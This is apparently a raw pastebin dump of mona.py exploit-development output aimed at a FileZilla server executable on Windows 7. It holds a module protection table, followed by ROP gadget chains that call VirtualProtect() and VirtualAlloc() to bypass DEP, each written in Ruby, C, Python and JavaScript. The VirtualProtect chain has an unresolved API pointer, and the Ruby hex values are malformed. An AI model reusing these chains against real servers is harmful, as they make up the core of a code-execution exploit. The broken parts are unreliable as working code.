
Untitled

a guest
Nov 24th, 2014
  1. ----------------------------------------------------------------------------------------------------------------------------------
  2. Module info :
  3. ----------------------------------------------------------------------------------------------------------------------------------
  4. Base | Top | Size | Rebase | SafeSEH | ASLR | NXCompat | OS Dll | Version, Modulename & Path
  5. ----------------------------------------------------------------------------------------------------------------------------------
  6. 0x756c0000 | 0x757dd000 | 0x0011d000 | True | True | True | True | True | 6.1.7600.16385 [CRYPT32.dll] (C:\Windows\system32\CRYPT32.dll)
  7. 0x75630000 | 0x7563c000 | 0x0000c000 | True | True | True | True | True | 6.1.7601.17514 [MSASN1.dll] (C:\Windows\system32\MSASN1.dll)
  8. 0x74ff0000 | 0x74ff6000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [wship6.dll] (C:\Windows\System32\wship6.dll)
  9. 0x772c0000 | 0x77394000 | 0x000d4000 | True | True | True | True | True | 6.1.7600.16385 [kernel32.dll] (C:\Windows\system32\kernel32.dll)
  10. 0x758c0000 | 0x7596c000 | 0x000ac000 | True | True | True | True | True | 7.0.7600.16385 [msvcrt.dll] (C:\Windows\system32\msvcrt.dll)
  11. 0x77470000 | 0x775ac000 | 0x0013c000 | True | True | True | True | True | 6.1.7600.16385 [ntdll.dll] (C:\Windows\SYSTEM32\ntdll.dll)
  12. 0x76200000 | 0x76219000 | 0x00019000 | True | True | True | True | True | 6.1.7600.16385 [sechost.dll] (C:\Windows\SYSTEM32\sechost.dll)
  13. 0x74ad0000 | 0x74ad5000 | 0x00005000 | True | True | True | True | True | 6.1.7600.16385 [wshtcpip.dll] (C:\Windows\System32\wshtcpip.dll)
  14. 0x775b0000 | 0x775ba000 | 0x0000a000 | True | True | True | True | True | 6.1.7600.16385 [LPK.dll] (C:\Windows\system32\LPK.dll)
  15. 0x75c80000 | 0x75d1d000 | 0x0009d000 | True | True | True | True | True | 1.0626.7601.17514 [USP10.dll] (C:\Windows\system32\USP10.dll)
  16. 0x773a0000 | 0x77469000 | 0x000c9000 | True | True | True | True | True | 6.1.7601.17514 [USER32.dll] (C:\Windows\system32\USER32.dll)
  17. 0x75e00000 | 0x75ea1000 | 0x000a1000 | True | True | True | True | True | 6.1.7600.16385 [RPCRT4.dll] (C:\Windows\system32\RPCRT4.dll)
  18. 0x761e0000 | 0x761ff000 | 0x0001f000 | True | True | True | True | True | 6.1.7601.17514 [IMM32.DLL] (C:\Windows\system32\IMM32.DLL)
  19. 0x71c60000 | 0x71c66000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [wls0wndh.dll] (C:\Windows\system32\wls0wndh.dll)
  20. 0x775c0000 | 0x775c6000 | 0x00006000 | True | True | True | True | True | 6.1.7600.16385 [NSI.dll] (C:\Windows\system32\NSI.dll)
  21. 0x771f0000 | 0x772bc000 | 0x000cc000 | True | True | True | True | True | 6.1.7600.16385 [MSCTF.dll] (C:\Windows\system32\MSCTF.dll)
  22. 0x75670000 | 0x756ba000 | 0x0004a000 | True | True | True | True | True | 6.1.7600.16385 [KERNELBASE.dll] (C:\Windows\system32\KERNELBASE.dll)
  23. 0x74bb0000 | 0x74bb9000 | 0x00009000 | True | True | True | True | True | 6.1.7600.16385 [VERSION.dll] (C:\Windows\system32\VERSION.dll)
  24. 0x75000000 | 0x7503c000 | 0x0003c000 | True | True | True | True | True | 6.1.7600.16385 [mswsock.dll] (C:\Windows\system32\mswsock.dll)
  25. 0x770a0000 | 0x770ee000 | 0x0004e000 | True | True | True | True | True | 6.1.7601.17514 [GDI32.dll] (C:\Windows\system32\GDI32.dll)
  26. 0x10000000 | 0x100a1000 | 0x000a1000 | False | False | False | False | False | 0.9.40.0 [FileZilla server_fixed.exe] (C:\Users\win7\Desktop\ftp\FileZilla server_fixed.exe)
  27. 0x77600000 | 0x776a0000 | 0x000a0000 | True | True | True | True | True | 6.1.7600.16385 [ADVAPI32.dll] (C:\Windows\system32\ADVAPI32.dll)
  28. 0x75c40000 | 0x75c75000 | 0x00035000 | True | True | True | True | True | 6.1.7600.16385 [WS2_32.dll] (C:\Windows\system32\WS2_32.dll)
  29. ----------------------------------------------------------------------------------------------------------------------------------
  30.  
  31. ################################################################################
  32.  
  33. Register setup for VirtualProtect() :
  34. --------------------------------------------
  35. EAX = NOP (0x90909090)
  36. ECX = lpOldProtect (ptr to W address)
  37. EDX = NewProtect (0x40)
  38. EBX = dwSize
  39. ESP = lpAddress (automatic)
  40. EBP = ReturnTo (ptr to jmp esp)
  41. ESI = ptr to VirtualProtect()
  42. EDI = ROP NOP (RETN)
  43. --- alternative chain ---
  44. EAX = ptr to &VirtualProtect()
  45. ECX = lpOldProtect (ptr to W address)
  46. EDX = NewProtect (0x40)
  47. EBX = dwSize
  48. ESP = lpAddress (automatic)
  49. EBP = POP (skip 4 bytes)
  50. ESI = ptr to JMP [EAX]
  51. EDI = ROP NOP (RETN)
  52. + place ptr to "jmp esp" on stack, below PUSHAD
  53. --------------------------------------------
  54.  
  55.  
  56. ROP Chain for VirtualProtect() [(XP/2003 Server and up)] :
  57. ----------------------------------------------------------
  58.  
  59. *** [ Ruby ] ***
  60.  
  61. def create_rop_chain()
  62.  
  63. # rop chain generated with mona.py - www.corelan.be
  64. rop_gadgets =
  65. [
  66. 0x00 00 00 00, # [-] Unable to find API pointer -> eax
  67. 0x10 07 89 40, # MOV EAX,DWORD PTR DS:[EAX] # POP ESI # POP EBP # RETN [FileZilla server_fixed.exe]
  68. 0x41 41 41 41, # Filler (compensate)
  69. 0x41 41 41 41, # Filler (compensate)
  70. 0x10 02 f7 f0, # PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
  71. 0x10 06 31 96, # POP EBP # RETN [FileZilla server_fixed.exe]
  72. 0x10 02 35 1a, # & push esp # ret [FileZilla server_fixed.exe]
  73. 0x10 02 2a 13, # POP EBX # RETN [FileZilla server_fixed.exe]
  74. 0x00 00 02 01, # 0x00000201-> ebx
  75. 0x10 05 57 be, # POP EBX # RETN [FileZilla server_fixed.exe]
  76. 0x00 00 00 40, # 0x00000040-> edx
  77. 0x10 07 c0 5c, # XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
  78. 0x10 07 8e 3e, # ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
  79. 0x41 41 41 41, # Filler (compensate)
  80. 0x10 07 e8 d3, # POP ECX # RETN [FileZilla server_fixed.exe]
  81. 0x41 41 41 41, # Filler (RETN offset compensation)
  82. 0x41 41 41 41, # Filler (RETN offset compensation)
  83. 0x41 41 41 41, # Filler (RETN offset compensation)
  84. 0x41 41 41 41, # Filler (RETN offset compensation)
  85. 0x10 09 a0 62, # &Writable location [FileZilla server_fixed.exe]
  86. 0x10 05 2a 65, # POP EDI # RETN [FileZilla server_fixed.exe]
  87. 0x10 06 88 84, # RETN (ROP NOP) [FileZilla server_fixed.exe]
  88. 0x10 02 ae af, # POP EAX # RETN [FileZilla server_fixed.exe]
  89. 0x90 90 90 90, # nop
  90. 0x10 04 e7 42, # PUSHAD # RETN 0x04 [FileZilla server_fixed.exe]
  91. ].flatten.pack("V*")
  92.  
  93. return rop_gadgets
  94.  
  95. end
  96.  
  97.  
  98. # Call the ROP chain generator inside the 'exploit' function :
  99.  
  100.  
  101. rop_chain = create_rop_chain()
  102.  
  103.  
  104.  
  105. *** [ C ] ***
  106.  
  107. #define CREATE_ROP_CHAIN(name, ...) \
  108. int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
  109. unsigned int name[name##_length / sizeof(unsigned int)]; \
  110. create_rop_chain(name, ##__VA_ARGS__);
  111.  
  112. int create_rop_chain(unsigned int *buf, unsigned int )
  113. {
  114. // rop chain generated with mona.py - www.corelan.be
  115. unsigned int rop_gadgets[] = {
  116. 0x00000000, // [-] Unable to find API pointer -> eax
  117. 0x10078940, // MOV EAX,DWORD PTR DS:[EAX] // POP ESI // POP EBP // RETN [FileZilla server_fixed.exe]
  118. 0x41414141, // Filler (compensate)
  119. 0x41414141, // Filler (compensate)
  120. 0x1002f7f0, // PUSH EAX // ADD AL,8B // DEC ESI // PUSHAD // MOV DWORD PTR DS:[EAX+8],ECX // MOV EDX,DWORD PTR DS:[ESI+64] // ADD ESP,4 // MOV DWORD PTR DS:[EAX+C],EDX // POP ESI // RETN [FileZilla server_fixed.exe]
  121. 0x10063196, // POP EBP // RETN [FileZilla server_fixed.exe]
  122. 0x1002351a, // & push esp // ret [FileZilla server_fixed.exe]
  123. 0x10022a13, // POP EBX // RETN [FileZilla server_fixed.exe]
  124. 0x00000201, // 0x00000201-> ebx
  125. 0x100557be, // POP EBX // RETN [FileZilla server_fixed.exe]
  126. 0x00000040, // 0x00000040-> edx
  127. 0x1007c05c, // XOR EDX,EDX // RETN [FileZilla server_fixed.exe]
  128. 0x10078e3e, // ADD EDX,EBX // POP EBX // RETN 0x10 [FileZilla server_fixed.exe]
  129. 0x41414141, // Filler (compensate)
  130. 0x1007e8d3, // POP ECX // RETN [FileZilla server_fixed.exe]
  131. 0x41414141, // Filler (RETN offset compensation)
  132. 0x41414141, // Filler (RETN offset compensation)
  133. 0x41414141, // Filler (RETN offset compensation)
  134. 0x41414141, // Filler (RETN offset compensation)
  135. 0x1009a062, // &Writable location [FileZilla server_fixed.exe]
  136. 0x10052a65, // POP EDI // RETN [FileZilla server_fixed.exe]
  137. 0x10068884, // RETN (ROP NOP) [FileZilla server_fixed.exe]
  138. 0x1002aeaf, // POP EAX // RETN [FileZilla server_fixed.exe]
  139. 0x90909090, // nop
  140. 0x1004e742, // PUSHAD // RETN 0x04 [FileZilla server_fixed.exe]
  141. };
  142. if(buf != NULL) {
  143. memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
  144. };
  145. return sizeof(rop_gadgets);
  146. }
  147.  
  148. // use the 'rop_chain' variable after this call, it's just an unsigned int[]
  149. CREATE_ROP_CHAIN(rop_chain, );
  150. // alternatively just allocate a large enough buffer and get the rop chain, i.e.:
  151. // unsigned int rop_chain[256];
  152. // int rop_chain_length = create_rop_chain(rop_chain, );
  153.  
  154. *** [ Python ] ***
  155.  
  156. def create_rop_chain():
  157.  
  158. # rop chain generated with mona.py - www.corelan.be
  159. rop_gadgets = [
  160. 0x00000000, # [-] Unable to find API pointer -> eax
  161. 0x10078940, # MOV EAX,DWORD PTR DS:[EAX] # POP ESI # POP EBP # RETN [FileZilla server_fixed.exe]
  162. 0x41414141, # Filler (compensate)
  163. 0x41414141, # Filler (compensate)
  164. 0x1002f7f0, # PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
  165. 0x10063196, # POP EBP # RETN [FileZilla server_fixed.exe]
  166. 0x1002351a, # & push esp # ret [FileZilla server_fixed.exe]
  167. 0x10022a13, # POP EBX # RETN [FileZilla server_fixed.exe]
  168. 0x00000201, # 0x00000201-> ebx
  169. 0x100557be, # POP EBX # RETN [FileZilla server_fixed.exe]
  170. 0x00000040, # 0x00000040-> edx
  171. 0x1007c05c, # XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
  172. 0x10078e3e, # ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
  173. 0x41414141, # Filler (compensate)
  174. 0x1007e8d3, # POP ECX # RETN [FileZilla server_fixed.exe]
  175. 0x41414141, # Filler (RETN offset compensation)
  176. 0x41414141, # Filler (RETN offset compensation)
  177. 0x41414141, # Filler (RETN offset compensation)
  178. 0x41414141, # Filler (RETN offset compensation)
  179. 0x1009a062, # &Writable location [FileZilla server_fixed.exe]
  180. 0x10052a65, # POP EDI # RETN [FileZilla server_fixed.exe]
  181. 0x10068884, # RETN (ROP NOP) [FileZilla server_fixed.exe]
  182. 0x1002aeaf, # POP EAX # RETN [FileZilla server_fixed.exe]
  183. 0x90909090, # nop
  184. 0x1004e742, # PUSHAD # RETN 0x04 [FileZilla server_fixed.exe]
  185. ]
  186. return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
  187.  
  188. rop_chain = create_rop_chain()
  189.  
  190.  
  191.  
  192. *** [ JavaScript ] ***
  193.  
  194. //rop chain generated with mona.py - www.corelan.be
  195. rop_gadgets = unescape(
  196. "%u0000%u0000" + // 0x00000000 : ,# [-] Unable to find API pointer -> eax
  197. "%u8940%u1007" + // 0x10078940 : ,# MOV EAX,DWORD PTR DS:[EAX] # POP ESI # POP EBP # RETN [FileZilla server_fixed.exe]
  198. "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
  199. "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
  200. "%uf7f0%u1002" + // 0x1002f7f0 : ,# PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
  201. "%u3196%u1006" + // 0x10063196 : ,# POP EBP # RETN [FileZilla server_fixed.exe]
  202. "%u351a%u1002" + // 0x1002351a : ,# & push esp # ret[FileZilla server_fixed.exe]
  203. "%u2a13%u1002" + // 0x10022a13 : ,# POP EBX # RETN [FileZilla server_fixed.exe]
  204. "%u0201%u0000" + // 0x00000201 : ,# 0x00000201-> ebx
  205. "%u57be%u1005" + // 0x100557be : ,# POP EBX # RETN [FileZilla server_fixed.exe]
  206. "%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> edx
  207. "%uc05c%u1007" + // 0x1007c05c : ,# XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
  208. "%u8e3e%u1007" + // 0x10078e3e : ,# ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
  209. "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
  210. "%ue8d3%u1007" + // 0x1007e8d3 : ,# POP ECX # RETN [FileZilla server_fixed.exe]
  211. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  212. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  213. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  214. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  215. "%ua062%u1009" + // 0x1009a062 : ,# &Writable location [FileZilla server_fixed.exe]
  216. "%u2a65%u1005" + // 0x10052a65 : ,# POP EDI # RETN [FileZilla server_fixed.exe]
  217. "%u8884%u1006" + // 0x10068884 : ,# RETN (ROP NOP) [FileZilla server_fixed.exe]
  218. "%uaeaf%u1002" + // 0x1002aeaf : ,# POP EAX # RETN [FileZilla server_fixed.exe]
  219. "%u9090%u9090" + // 0x90909090 : ,# nop
  220. "%ue742%u1004" + // 0x1004e742 : ,# PUSHAD # RETN 0x04 [FileZilla server_fixed.exe]
  221. ""); // :
  222.  
  223.  
  224. --------------------------------------------------------------------------------------------------
  225.  
  226.  
  227. ################################################################################
  228.  
  229. Register setup for VirtualAlloc() :
  230. --------------------------------------------
  231. EAX = NOP (0x90909090)
  232. ECX = flProtect (0x40)
  233. EDX = flAllocationType (0x1000)
  234. EBX = dwSize
  235. ESP = lpAddress (automatic)
  236. EBP = ReturnTo (ptr to jmp esp)
  237. ESI = ptr to VirtualAlloc()
  238. EDI = ROP NOP (RETN)
  239. --- alternative chain ---
  240. EAX = ptr to &VirtualAlloc()
  241. ECX = flProtect (0x40)
  242. EDX = flAllocationType (0x1000)
  243. EBX = dwSize
  244. ESP = lpAddress (automatic)
  245. EBP = POP (skip 4 bytes)
  246. ESI = ptr to JMP [EAX]
  247. EDI = ROP NOP (RETN)
  248. + place ptr to "jmp esp" on stack, below PUSHAD
  249. --------------------------------------------
  250.  
  251.  
  252. ROP Chain for VirtualAlloc() [(XP/2003 Server and up)] :
  253. --------------------------------------------------------
  254.  
  255. *** [ Ruby ] ***
  256.  
  257. def create_rop_chain()
  258.  
  259. # rop chain generated with mona.py - www.corelan.be
  260. rop_gadgets =
  261. [
  262. 0x1004388a, # POP ESI # RETN [FileZilla server_fixed.exe]
  263. 0x10082148, # ptr to &VirtualAlloc() [IAT FileZilla server_fixed.exe]
  264. 0x1000c99f, # MOV EAX,DWORD PTR DS:[ESI] # POP ESI # POP ECX # RETN [FileZilla server_fixed.exe]
  265. 0x41414141, # Filler (compensate)
  266. 0x41414141, # Filler (compensate)
  267. 0x1002f7f0, # PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
  268. 0x1005e2e1, # POP EBP # RETN [FileZilla server_fixed.exe]
  269. 0x10007dba, # & push esp # ret [FileZilla server_fixed.exe]
  270. 0x100681a5, # POP EBX # RETN [FileZilla server_fixed.exe]
  271. 0x00000001, # 0x00000001-> ebx
  272. 0x10055082, # POP EBX # RETN [FileZilla server_fixed.exe]
  273. 0x00001000, # 0x00001000-> edx
  274. 0x1007c05c, # XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
  275. 0x10078e3e, # ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
  276. 0x41414141, # Filler (compensate)
  277. 0x10080d44, # POP ECX # RETN [FileZilla server_fixed.exe]
  278. 0x41414141, # Filler (RETN offset compensation)
  279. 0x41414141, # Filler (RETN offset compensation)
  280. 0x41414141, # Filler (RETN offset compensation)
  281. 0x41414141, # Filler (RETN offset compensation)
  282. 0x00000040, # 0x00000040-> ecx
  283. 0x10066f18, # POP EDI # RETN [FileZilla server_fixed.exe]
  284. 0x10068884, # RETN (ROP NOP) [FileZilla server_fixed.exe]
  285. 0x1002aeaf, # POP EAX # RETN [FileZilla server_fixed.exe]
  286. 0x90909090, # nop
  287. 0x10014f48, # PUSHAD # RETN 0x0C [FileZilla server_fixed.exe]
  288. ].flatten.pack("V*")
  289.  
  290. return rop_gadgets
  291.  
  292. end
  293.  
  294.  
  295. # Call the ROP chain generator inside the 'exploit' function :
  296.  
  297.  
  298. rop_chain = create_rop_chain()
  299.  
  300.  
  301.  
  302. *** [ C ] ***
  303.  
  304. #define CREATE_ROP_CHAIN(name, ...) \
  305. int name##_length = create_rop_chain(NULL, ##__VA_ARGS__); \
  306. unsigned int name[name##_length / sizeof(unsigned int)]; \
  307. create_rop_chain(name, ##__VA_ARGS__);
  308.  
  309. int create_rop_chain(unsigned int *buf, unsigned int )
  310. {
  311. // rop chain generated with mona.py - www.corelan.be
  312. unsigned int rop_gadgets[] = {
  313. 0x1004388a, // POP ESI // RETN [FileZilla server_fixed.exe]
  314. 0x10082148, // ptr to &VirtualAlloc() [IAT FileZilla server_fixed.exe]
  315. 0x1000c99f, // MOV EAX,DWORD PTR DS:[ESI] // POP ESI // POP ECX // RETN [FileZilla server_fixed.exe]
  316. 0x41414141, // Filler (compensate)
  317. 0x41414141, // Filler (compensate)
  318. 0x1002f7f0, // PUSH EAX // ADD AL,8B // DEC ESI // PUSHAD // MOV DWORD PTR DS:[EAX+8],ECX // MOV EDX,DWORD PTR DS:[ESI+64] // ADD ESP,4 // MOV DWORD PTR DS:[EAX+C],EDX // POP ESI // RETN [FileZilla server_fixed.exe]
  319. 0x1005e2e1, // POP EBP // RETN [FileZilla server_fixed.exe]
  320. 0x10007dba, // & push esp // ret [FileZilla server_fixed.exe]
  321. 0x100681a5, // POP EBX // RETN [FileZilla server_fixed.exe]
  322. 0x00000001, // 0x00000001-> ebx
  323. 0x10055082, // POP EBX // RETN [FileZilla server_fixed.exe]
  324. 0x00001000, // 0x00001000-> edx
  325. 0x1007c05c, // XOR EDX,EDX // RETN [FileZilla server_fixed.exe]
  326. 0x10078e3e, // ADD EDX,EBX // POP EBX // RETN 0x10 [FileZilla server_fixed.exe]
  327. 0x41414141, // Filler (compensate)
  328. 0x10080d44, // POP ECX // RETN [FileZilla server_fixed.exe]
  329. 0x41414141, // Filler (RETN offset compensation)
  330. 0x41414141, // Filler (RETN offset compensation)
  331. 0x41414141, // Filler (RETN offset compensation)
  332. 0x41414141, // Filler (RETN offset compensation)
  333. 0x00000040, // 0x00000040-> ecx
  334. 0x10066f18, // POP EDI // RETN [FileZilla server_fixed.exe]
  335. 0x10068884, // RETN (ROP NOP) [FileZilla server_fixed.exe]
  336. 0x1002aeaf, // POP EAX // RETN [FileZilla server_fixed.exe]
  337. 0x90909090, // nop
  338. 0x10014f48, // PUSHAD // RETN 0x0C [FileZilla server_fixed.exe]
  339. };
  340. if(buf != NULL) {
  341. memcpy(buf, rop_gadgets, sizeof(rop_gadgets));
  342. };
  343. return sizeof(rop_gadgets);
  344. }
  345.  
  346. // use the 'rop_chain' variable after this call, it's just an unsigned int[]
  347. CREATE_ROP_CHAIN(rop_chain, );
  348. // alternatively just allocate a large enough buffer and get the rop chain, i.e.:
  349. // unsigned int rop_chain[256];
  350. // int rop_chain_length = create_rop_chain(rop_chain, );
  351.  
  352. *** [ Python ] ***
  353.  
  354. def create_rop_chain():
  355.  
  356. # rop chain generated with mona.py - www.corelan.be
  357. rop_gadgets = [
  358. 0x1004388a, # POP ESI # RETN [FileZilla server_fixed.exe]
  359. 0x10082148, # ptr to &VirtualAlloc() [IAT FileZilla server_fixed.exe]
  360. 0x1000c99f, # MOV EAX,DWORD PTR DS:[ESI] # POP ESI # POP ECX # RETN [FileZilla server_fixed.exe]
  361. 0x41414141, # Filler (compensate)
  362. 0x41414141, # Filler (compensate)
  363. 0x1002f7f0, # PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
  364. 0x1005e2e1, # POP EBP # RETN [FileZilla server_fixed.exe]
  365. 0x10007dba, # & push esp # ret [FileZilla server_fixed.exe]
  366. 0x100681a5, # POP EBX # RETN [FileZilla server_fixed.exe]
  367. 0x00000001, # 0x00000001-> ebx
  368. 0x10055082, # POP EBX # RETN [FileZilla server_fixed.exe]
  369. 0x00001000, # 0x00001000-> edx
  370. 0x1007c05c, # XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
  371. 0x10078e3e, # ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
  372. 0x41414141, # Filler (compensate)
  373. 0x10080d44, # POP ECX # RETN [FileZilla server_fixed.exe]
  374. 0x41414141, # Filler (RETN offset compensation)
  375. 0x41414141, # Filler (RETN offset compensation)
  376. 0x41414141, # Filler (RETN offset compensation)
  377. 0x41414141, # Filler (RETN offset compensation)
  378. 0x00000040, # 0x00000040-> ecx
  379. 0x10066f18, # POP EDI # RETN [FileZilla server_fixed.exe]
  380. 0x10068884, # RETN (ROP NOP) [FileZilla server_fixed.exe]
  381. 0x1002aeaf, # POP EAX # RETN [FileZilla server_fixed.exe]
  382. 0x90909090, # nop
  383. 0x10014f48, # PUSHAD # RETN 0x0C [FileZilla server_fixed.exe]
  384. ]
  385. return ''.join(struct.pack('<I', _) for _ in rop_gadgets)
  386.  
  387. rop_chain = create_rop_chain()
  388.  
  389.  
  390.  
  391. *** [ JavaScript ] ***
  392.  
  393. //rop chain generated with mona.py - www.corelan.be
  394. rop_gadgets = unescape(
  395. "%u388a%u1004" + // 0x1004388a : ,# POP ESI # RETN [FileZilla server_fixed.exe]
  396. "%u2148%u1008" + // 0x10082148 : ,# ptr to &VirtualAlloc() [IAT FileZilla server_fixed.exe]
  397. "%uc99f%u1000" + // 0x1000c99f : ,# MOV EAX,DWORD PTR DS:[ESI] # POP ESI # POP ECX # RETN [FileZilla server_fixed.exe]
  398. "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
  399. "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
  400. "%uf7f0%u1002" + // 0x1002f7f0 : ,# PUSH EAX # ADD AL,8B # DEC ESI # PUSHAD # MOV DWORD PTR DS:[EAX+8],ECX # MOV EDX,DWORD PTR DS:[ESI+64] # ADD ESP,4 # MOV DWORD PTR DS:[EAX+C],EDX # POP ESI # RETN [FileZilla server_fixed.exe]
  401. "%ue2e1%u1005" + // 0x1005e2e1 : ,# POP EBP # RETN [FileZilla server_fixed.exe]
  402. "%u7dba%u1000" + // 0x10007dba : ,# & push esp # ret[FileZilla server_fixed.exe]
  403. "%u81a5%u1006" + // 0x100681a5 : ,# POP EBX # RETN [FileZilla server_fixed.exe]
  404. "%u0001%u0000" + // 0x00000001 : ,# 0x00000001-> ebx
  405. "%u5082%u1005" + // 0x10055082 : ,# POP EBX # RETN [FileZilla server_fixed.exe]
  406. "%u1000%u0000" + // 0x00001000 : ,# 0x00001000-> edx
  407. "%uc05c%u1007" + // 0x1007c05c : ,# XOR EDX,EDX # RETN [FileZilla server_fixed.exe]
  408. "%u8e3e%u1007" + // 0x10078e3e : ,# ADD EDX,EBX # POP EBX # RETN 0x10 [FileZilla server_fixed.exe]
  409. "%u4141%u4141" + // 0x41414141 : ,# Filler (compensate)
  410. "%u0d44%u1008" + // 0x10080d44 : ,# POP ECX # RETN [FileZilla server_fixed.exe]
  411. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  412. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  413. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  414. "%u4141%u4141" + // 0x41414141 : ,# Filler (RETN offset compensation)
  415. "%u0040%u0000" + // 0x00000040 : ,# 0x00000040-> ecx
  416. "%u6f18%u1006" + // 0x10066f18 : ,# POP EDI # RETN [FileZilla server_fixed.exe]
  417. "%u8884%u1006" + // 0x10068884 : ,# RETN (ROP NOP) [FileZilla server_fixed.exe]
  418. "%uaeaf%u1002" + // 0x1002aeaf : ,# POP EAX # RETN [FileZilla server_fixed.exe]
  419. "%u9090%u9090" + // 0x90909090 : ,# nop
  420. "%u4f48%u1001" + // 0x10014f48 : ,# PUSHAD # RETN 0x0C [FileZilla server_fixed.exe]
  421. ""); // :
  422.  
  423.  
  424. --------------------------------------------------------------------------------------------------